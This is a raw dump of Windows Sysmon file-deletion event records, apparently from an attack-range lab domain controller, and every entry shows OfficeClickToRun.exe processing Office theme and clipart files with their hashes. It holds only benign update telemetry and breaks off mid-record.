23542300x800000000000000066850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Inset.eftxMD5=AC6FAD47FF29EAA54C468759E05D5784,SHA256=1F0A41CA55A704A78F1B7ABEE7A6F30EA754FE6F2534C583A6DFEEFA40099798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Grunge Texture.eftxMD5=B78E1DF8F2C97C032104FC4358D83F56,SHA256=79833C4A7B91B79B9605BACA5AF026B852F4A814A61DBC105B8B703969A32051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Glow Edge.eftxMD5=D112AC88187ED62D87D922A5014FF022,SHA256=5E2AB5DF584FEC7DF82B594D9375CE2CD442B0CE1DF8E98DDB256B96F01C06F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Glossy.eftxMD5=A7E47170E14C627AC56DB25A53D67988,SHA256=2521A375D86B418D782C6933DCE2B9A49AA407776974B7830890AD17C8FC7A3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Frosted Glass.eftxMD5=8829B8E160BDBB58D7ECEEDA6596F334,SHA256=86DCC88C960FE7F0B9FAFC29B7A3BC6D1862A1E07B9CE98DB5081454956CF691,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Extreme Shadow.eftxMD5=1DA1B380B2DF7EF309742602C79E347A,SHA256=CD2F0AD5289926BE9725FD53FB92B2F23DA12115B54FAFB06614CA6D60C682A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Effects\Banded Edge.eftxMD5=EDAF876B1FE1304318535C2B937FE1EE,SHA256=C92AC05E7F69E7295D8CB0D20CC0598D14E2E1AB1EBDB4BF8F12DE19CB6BBC69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Yellow.xmlMD5=769200F906E3F84945F30815A0E65685,SHA256=463ED85916671FEC82ABCA6268CEFFCF783A7C9F472486F94391415918349A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Yellow Orange.xmlMD5=4A7887B3A5658FD7D5C959F3C67E2F72,SHA256=21753ECA8BCF996483421102298AE8691C8CA62584CB596A670ED3282BDE9642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Violet.xmlMD5=0FE15D53FEE73539C9B668AAD1EFBAEC,SHA256=BBA8DB5F33F54F0DC764DCB2CA3837A01629F2C00065AB673C16E71BD6F14161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Violet II.xmlMD5=3A3862C67B705C7A2065242EA8E73A1B,SHA256=6632D3ECD6B6252EFC7D8F757365128DA6F73DEA0B775811053FF54A8A083F8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Slipstream.xmlMD5=6B5B7D36FB0C242F6E86BA1F56D3E5B5,SHA256=97EFCA1BCAB06CAB1723248D9E4D6D111EF4F891A3E5948591346E2BA8E499F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Red.xmlMD5=CEA91A20DC90548A8B8FFAB49E015146,SHA256=0DDC023BE25E2BDD93BCA49D8D1BE6B6C8358E3D70830FA244D72A3F8DC7A391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Red Violet.xmlMD5=58D03B7C60B11597F3E0B85D17813CB8,SHA256=A3434095A1EDEE4D99A2062DFFB3BD70C204984AE78975D5BB8124C394CB6A55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Red Orange.xmlMD5=2530F3A9CFE37D27F01E47A4D8C91014,SHA256=996A491D3847A98CE986E659CA5F7B89708DC645D4380EE0382A1F34874C47FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Paper.xmlMD5=C699F9E547465108C9B51569B77CC42C,SHA256=10061B53BB595557324C1B8B7F7E705A2225ADC9BAB4133EC309853A5601024F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Orange.xmlMD5=96E4251C88E597FA7053CA995EC108A8,SHA256=BE4346C34AEDE2460C93BCEA421D7C655492DB43F5B06A1460E378A11B2CCA21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Orange Red.xmlMD5=A1932BEAB824C96F89BA2F10B4428FD5,SHA256=A3AB0E39CD871904631396F977E1868CE2C9DB9273FAAD088F651CCD84CE1D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Office 2007 - 2010.xmlMD5=36E5098835C490BB13487475AFAC0336,SHA256=094C9CCBF89D2EE78E8B3CBB72611D3374D25F2908F21B4F15F02836703BFF8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Median.xmlMD5=A7B7C140A0A5F983BC05FA81D7DB803A,SHA256=37568CB89AC2E4DE9A633278BBC56130AE17A3EA86176A3EDF2AFC63B702AE7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Marquee.xmlMD5=4174939E9B677A3F8FF3FD359EDF8E13,SHA256=72A3C9E428CC96690824CDBD5428681CB3E39A0373B1F440C0B869F729C737BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Green.xmlMD5=6133EADD056DBA345414FA8804285E03,SHA256=D67B8D1D43C138601E087CE18FBDC8925E7BCF9CFBF4E5B1F51C032A4625BA00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Green Yellow.xmlMD5=CDEA251BE79CB7F414313FC6E1DECAEB,SHA256=DE3D90FA3408EE38CA5901172765E8FAEA8B74AC4FC9C302817B35FEC015F26F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Grayscale.xmlMD5=9EE5E3431203E0109F2B67ED7B7112DC,SHA256=B3B1E270FA3E412A8255C6FA73D11578A9DAA085B62D2610DD9B55DC8BF29084,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Blue.xmlMD5=DFC1A532F07941F960743F61F713BD2B,SHA256=4D10199D5D8C6D14C7F9029086FB258ACD723F543D5C8F04FF39FD2E3BF4672E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Blue Warm.xmlMD5=F841614942BF35D03DE57D6BB7D9EF07,SHA256=F8A67FD91379A4A88808D377781AA0A4B64378D267E8B2E80FD392B70E32910F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Blue II.xmlMD5=481F9F11FE017A325CB466969E1C2D3A,SHA256=8103B4A709012F35752F2EE209181FFE8A90EEFB8C65DCA9E754178CECB23435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Blue Green.xmlMD5=B241E9C38DCB089898C61AD0C43692B5,SHA256=DC07AE0C5D1EB47BA1E5D81CFF256D658545CD0A7F5B4C5D5929B134CC58533D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Document Themes 16\Theme Colors\Aspect.xmlMD5=03EE75936EAD5185BAB35A90892140B2,SHA256=9C890666D56E27189323E869304BBD220EABD56CB87033BDE55EEF3EE7744620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02218_.GIFMD5=3BFC0875F7BF204874E0AD75B7A0F7FC,SHA256=4D8D48F59F831CD30C34A6FCC7187A470577BB555B6664CC08CBE1B1CCD4274E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02214_.GIFMD5=C9AB7077FE4722D9998A04607F88494D,SHA256=58AA13D853752315851B11209F0FECDCD7A52B68FE75074269978DF595BBD299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02201_.GIFMD5=A6A337523629BCEA29F6E6F2EDBAF12B,SHA256=7EAE5BAEFB14682B20547912A163282BD46CE8CC0AFAA8586B959A8C038CEDA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02198_.GIFMD5=41E8D23F205FD3E5DA7BD364EBFFACC7,SHA256=976AF56606F9B939FB26BFE4FE024B6448E74600B963886E279EBE53C274D13F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02187_.GIFMD5=6CCC3C8355FD806B1D8132047F43239B,SHA256=83635CD19EECD114D2AD9BADF5BB9709AD1A4A2CB4B5B6A55F0A72EDD25154D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02134_.GIFMD5=1637340B01096963A7E0DD543B73B1AE,SHA256=67AB062D526758E10C7FA35A1BB3E5A63C290EA63C897471FEF99FA14329BBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02116_.GIFMD5=B2B588DF4ED34E2308641C695C6B127C,SHA256=F58EE91C7F0B09D3A72A72EC0386EAF6C0DE98A6DAB46A5925F5D558B5B36CC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02106_.GIFMD5=5012E89B843A8AFC67BC1AE216485C34,SHA256=C32BB78D38895BA954E998DB45547277A25779536FBE2F5F9E2A4D8320DD09B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02097_.GIFMD5=C66D6B7A2E7F29191199979B0699B859,SHA256=7A858AF9BF83F8B0495DF7B7A3348130CEE404B83B83DD749E54163D87A36271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02085_.GIFMD5=F91C1D0DA1B6F1BE3B44FCAAC106883F,SHA256=DA385F95DB027A368E4C7D78A3B3E9DBB7F090A5BA4325C48AD54B8C8F5DD96E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02082_.GIFMD5=973966381BCE700669FC5D8351B6A0C4,SHA256=7897B8D68287A086C5D2C5AA4DF855E07240E192F7C3CC6C792E9C179E87D286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02077_.GIFMD5=AD59B294A51BA4F622E8B5DC04E995DD,SHA256=597FEB460253797D83607A81988E07C1C0DA495D232767BDCD41485B6F5F6933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02074_.GIFMD5=5A80035D18BE8E02DAF3D77F715B4AB2,SHA256=5D827F52A7F6F2DE0DA8DCA09BBCCABE255498684222003DD396C7CBBEFD7B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02073_.GIFMD5=79B22D8B0F019CD9FD650F7B3AC2A6DC,SHA256=7045ACBD4EF35D5DBAE8BDADEA20E13486D42188731D26C7A34F1743C2A2872D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\Publisher\Backgrounds\WB02055_.GIFMD5=B659F56519100974D22AF7691B726901,SHA256=971FC93B8ADB38F2E4176AB8BE733CF3444B6341D104C0FAB396DB81CC9EF8E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 